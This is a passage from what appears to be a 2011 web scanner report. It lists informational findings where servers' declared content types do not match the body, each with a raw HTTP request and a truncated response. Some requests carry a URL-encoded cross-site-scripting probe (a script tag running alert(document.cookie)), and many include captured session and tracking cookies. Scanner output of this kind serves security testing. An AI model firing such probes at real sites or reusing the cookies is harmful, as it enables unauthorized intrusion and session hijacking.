GET /PortalServe/?pid=1149217T71620101123190930&flash=10&time=1|19:35|-6&redir=http://r.turn.com/r/tpclick/id/pNyBDcYPcXUfRwEAbAABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBUDXq8Cg-TezoAqX6lAfajZWFA4200M4B9bmdvRSFp5HyFwAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1sgEOam9vbWxhY29kZS5vcme6AQk3Mjh4OTBfYXPIAQnaATJodHRwOi8vam9vbWxhY29kZS5vcmcvZ2YvcHJvamVjdC9qb29tbGEvcmVwb3J0aW5nL5gCggHAAgTIArWc1RHgAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtzBe5EVxfoGXmcp6PQnZKB63g35FA%26client%3Dca-pub-1189370408998555%26adurl%3D/url/$CTURL$&pos=s&r=0.4512364394031465 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=7A1A2F29-D5D5-4308-B63E-BE3AD3D2AA86; PRbu=EmUrRNwjG; PRvt=CDJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=D5990400-1924-8254-0209-118000C40100; PRca=|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#; PRcp=|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#; PRpl=|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#; PRcr=|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#; PRpc=|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 01:35:45 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 6312
Set-Cookie:PRvt=CEJOmEmUrRNwjGACOBBeJOJEmU0MxHpcAAkBAeJHsEmdTjgu6i!DSBBeJBaEmqG8ONudAI5BCe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A19A0400-38BC-9DDB-0309-05A002390102; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy9A:1|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

if(!window.prRefs){window.prRefs={}}window.prRefs['AC931A6999-1254-44BB-9596-52F9E99E7F03']='%3C%3Fxml version%3D%221%2E0%22 standalone%3D%22yes%22%3F%3E%3Cprdata%3E%3Cviewcount%3E%3C%21%5BCDATA%5BAH0
...[SNIP]...

32.21. http://ads.tweetmeme.com/impression.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.tweetmeme.com
Path:   /impression.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain plain text.

Request

GET /impression.jpg?id=137&rand=43514911277 HTTP/1.1
Host: ads.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tm_identity=1e736a4ffb2b89d8eb9feef196afe056

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 22:20:54 GMT
Content-Type: image/jpeg
Connection: close
P3P: CP="CAO PSA"
Cache-Control: no-cache, must-revalidate
Expires: Sat, 20 Jul 2000 08:00:00 GMT
Pragma: no-cache
X-Served-By: ded2061
Content-Length: 1

1

32.22. http://api.kickapps.com/rest/getvideometadata/404472/94274

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.kickapps.com
Path:   /rest/getvideometadata/404472/94274

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain;charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /rest/getvideometadata/404472/94274 HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Tue, 25 Jan 2011 02:23:09 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 46

{"status":"-1","error":"media does not exist"}

32.23. http://api.tweetmeme.com/url_info.jsonc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.tweetmeme.com
Path:   /url_info.jsonc

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /url_info.jsonc?url=http%3A%2F%2Fstarscene.dailystar.com.lb%2Fmusic-scenea960d%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Eb7d5247b69c%2F2010%2F11%2Fpianist-geoffrey-saba-performs-at-aubs-assembly-hall%2Fx22&callback=aptureJsonCallback1 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 24 Jan 2011 21:11:44 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-RateLimit-Limit: 400
X-RateLimit-Remaining: 400
X-Served-By: h02
Content-Length: 76

aptureJsonCallback1({"status":"failure","comment":"unable to resolve URL"});

32.24. http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.cloudscan.us
Path:   /examples/html/sql-injection-xss-cross-site-scripting-dork.html

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /examples/html/sql-injection-xss-cross-site-scripting-dork.html HTTP/1.1
Host: cdn.cloudscan.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: whoson=942-1294338785785; __utmz=108330077.1294765608.4.2.utmcsr=cdn.cloudscan.us|utmccn=(referral)|utmcmd=referral|utmcct=/redirect/; __utma=108330077.350499926.1294008031.1294765608.1294772434.5

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Tue, 25 Jan 2011 00:56:35 GMT
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

32.25. http://cdnserve.a-widget.com/service/getWidget2.kickAction

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdnserve.a-widget.com
Path:   /service/getWidget2.kickAction

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain;charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /service/getWidget2.kickAction?revision=14&as=94274&widgetId=160832 HTTP/1.1
Host: cdnserve.a-widget.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Last-Modified: 8 Oct 2010 21:11:48 GMT
Content-Type: text/plain;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Tue, 25 Jan 2011 02:23:06 GMT
Date: Tue, 25 Jan 2011 02:23:06 GMT
Connection: close
Content-Length: 3311

{"adBuyOut":true,"cs_rwid":"","cs_wid":"","feedAkHost":"serve.a-feed.com","height":"330","pathToPreview":"94274/photos/WIDGET_160832_ap.jpg","pathToPreview160X160":"94274/photos/WIDGET_160832_ap_160X1
...[SNIP]...

32.26. http://dave.willfork.com/slrnface/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dave.willfork.com
Path:   /slrnface/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /slrnface/ HTTP/1.1
Host: dave.willfork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:01:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=5b32519ccc82f0294fbd5165fdf92ac0; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=willfork.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Length: 6
Content-Type: text/html
X-Cache: MISS from 533313
Connection: close

<b-ua>

32.27. http://delb.opt.fimserve.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://delb.opt.fimserve.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"10-1172631264000"
Last-Modified: Wed, 28 Feb 2007 02:54:24 GMT
Content-Type: text/html
Content-Length: 10
Date: Tue, 25 Jan 2011 13:09:45 GMT

Not found

32.28. http://delb.opt.fimserve.com/fimbid/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://delb.opt.fimserve.com
Path:   /fimbid/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html;charset=ISO-8859-1
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /fimbid/?cachebuster=1295921111939Gck&cb=window[%22AIIcb%22]&sz=728x90&api=2&enc=1.1&est=b560d84a436c1f260f16c34efa66d8e3&l=52f2b867-a818-426d-a674-eefac27a73f6&ega=&neg=&pub=2094107610&pcat=29&ck=1&fl=1&d=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: delb.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoJk0pDkd8SnPo7AmDAg==; UI=284ab5a022ca529df|f..9.f.f.f.f@@f@@f@@f@@f@@f@@f; LO=00JW6MJ6I1c0G05B0010OPU; ssrtb=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: DMEXP=4; Domain=.opt.fimserve.com; Expires=Wed, 09-Feb-2011 02:05:10 GMT; Path=/
Set-Cookie: UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
Set-Cookie: RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 414
Date: Tue, 25 Jan 2011 02:05:10 GMT

window["AIIcb"]={"r":{"sb":250376,"s":"471D7F0124D207BA9A40CE442FD37ED1","ad":"http://delb.opt.fimserve.com/bidimp/?ek=AOb2kFWWo584nB3I07WnKWrRBKeP4UX2EIXzUl_oiuySRCRwepH6n3-YHiF_hVbgrMPpsVthY8EJlhEFk
...[SNIP]...

32.29. http://developer.joomla.org/media/system/js/mootools-more.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://developer.joomla.org
Path:   /media/system/js/mootools-more.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /media/system/js/mootools-more.js HTTP/1.1
Host: developer.joomla.org
Proxy-Connection: keep-alive
Referer: http://developer.joomla.org/security/news.html?dce01%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e865402a94b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; 39f24a85b5d169a21046edfe6eaa5320=5ad2cfaafece06e83d5d1454ed554fa9

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:06:32 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
Last-Modified: Mon, 10 Jan 2011 19:52:34 GMT
ETag: "62cf68-36c85-499834f1e6480"
Accept-Ranges: bytes
Content-Length: 224389
Content-Type: application/javascript

MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+
...[SNIP]...

32.30. http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab

Summary

Severity:   Information
Confidence:   Firm
Host:   http://download.macromedia.com
Path:   /pub/shockwave/cabs/director/sw.cab

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /pub/shockwave/cabs/director/sw.cab HTTP/1.1
Host: download.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 22 Oct 2010 12:14:09 GMT
ETag: "e6016-25803-94636640"
Accept-Ranges: bytes
Content-Length: 153603
Content-Type: text/plain
Expires: Mon, 24 Jan 2011 15:06:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 15:06:01 GMT
Connection: close

MSCF.....F......D............................F..............|.................V=..!.swdir.inf...........V=r. .installer.exe.q...tO..CK..}|T..?|.%..&. ....!(......t.9.....2.B..L..!I.sxi.$..2.F.........
...[SNIP]...

32.31. http://drn.newsguy.com/newsgrps.txt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drn.newsguy.com
Path:   /newsgrps.txt

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /newsgrps.txt HTTP/1.1
Host: drn.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:06:09 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Last-Modified: Mon, 24 Jan 2011 11:20:01 GMT
ETag: "109f1c4-264bbf-4d3d6061"
Accept-Ranges: bytes
Content-Length: 2509759
Connection: close
Content-Type: text/plain

Don't see a newsgroup on our list? Just let us know & we'd be happy to add it!

0
0.akita-inu
0.alaskan-malamute
0.alaskan-malamutes
0.siberian-huskys
0.test
0.verizon.adsl
0.verizon.discussion-genera
...[SNIP]...

32.32. http://fastdial.com/misc/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://fastdial.com
Path:   /misc/favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /misc/favicon.ico HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:20 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Sep 2007 08:41:57 GMT
ETag: "f50056-1536-43a50c6fb5f40"
Accept-Ranges: bytes
Content-Length: 5430
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 02:03:20 GMT
Content-Type: text/plain; charset=UTF-8

............ .h...&... .... .........(....... ..... .........................................}N...W.z.X...W...l!..y6..^...R.".............................W.G.V...Y...Y....[...{...P...u..|6..U.z......
...[SNIP]...

32.33. http://hostedusa3.whoson.com/include.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hostedusa3.whoson.com
Path:   /include.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

32.34. http://hostedusa3.whoson.com/invite.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hostedusa3.whoson.com
Path:   /invite.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /invite.js HTTP/1.1
Host: hostedusa3.whoson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 315

document.write("<div style='text-align:center;padding:5px'>WhosOn Live Stats &amp; Live Chat services are not active for this site. Please remove the tracking code or re-activate your service. Please
...[SNIP]...

32.35. http://javadl-esd.sun.com/update/AU/map-2.0.2.4.xml

Summary

Severity:   Information
Confidence:   Firm
Host:   http://javadl-esd.sun.com
Path:   /update/AU/map-2.0.2.4.xml

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update/AU/map-2.0.2.4.xml HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: javadl-esd.sun.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 15
Date: Sun, 23 Jan 2011 16:10:49 GMT
Connection: close
Cache-Control: private

File not found.

32.36. http://joomlacode.org/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://joomlacode.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: joomlacode.org
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.1.10.1295919318

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Aug 2008 06:48:54 GMT
ETag: "1358c42-47e-4543daa50c180"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .........#...#.............PK..Q...P...Q.................................4@..5@..5@..5@._..Q...P...P...Q...P...Q...1G........,5.Q5@..5@..4?..5@..5@..5@....Q...Q...
...[SNIP]...

32.37. http://joomlacode.org/gf/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://joomlacode.org
Path:   /gf/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /gf/?action=Rss&section=activity&project_id=5 HTTP/1.1
Host: joomlacode.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=9359d8f79e15ae5a:T=1295919318:S=ALNI_Mb9KeJU8eq3mD4PF_k88Atvfmn5hg; __utmz=13354156.1295919321.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/47; __utma=13354156.760811261.1295919318.1295919318.1295919318.1; __utmc=13354156; __utmb=13354156.5.10.1295919318;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:58:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 7581
Connection: close
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="ISO-8859-1"?>
<rss version="2.0">
<channel>
<title>JoomlaCode - Joomla! - Activity</title>
<link>http://joomlacode.org/gf/</link>
<description>Gforge Advanced Server RSS<
...[SNIP]...

32.38. http://keywords.fmpub.net/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://keywords.fmpub.net
Path:   /

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?t=js&s=310&u=http%3A%2F%2Fads.tweetmeme.com%2Fserve.js%3Ftag%3Dhome%26width%3D300%26height%3D600%26rand%3D26297691596 HTTP/1.1
Host: keywords.fmpub.net
Proxy-Connection: keep-alive
Referer: http://ads.tweetmeme.com/serve.js?tag=home&width=300&height=600&rand=26297691596
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:56 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Server: adserver2.chi.fmpub.net
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32

var ___fm_kw = '';___fm_kw = '';

32.39. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction

Summary

Severity:   Information
Confidence:   Firm
Host:   http://kickapps.yuku.com
Path:   /kickapps/service/getWidget.kickAction

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /kickapps/service/getWidget.kickAction?widgetId=21535&as=40337 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:22:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:22:44 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 3223
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

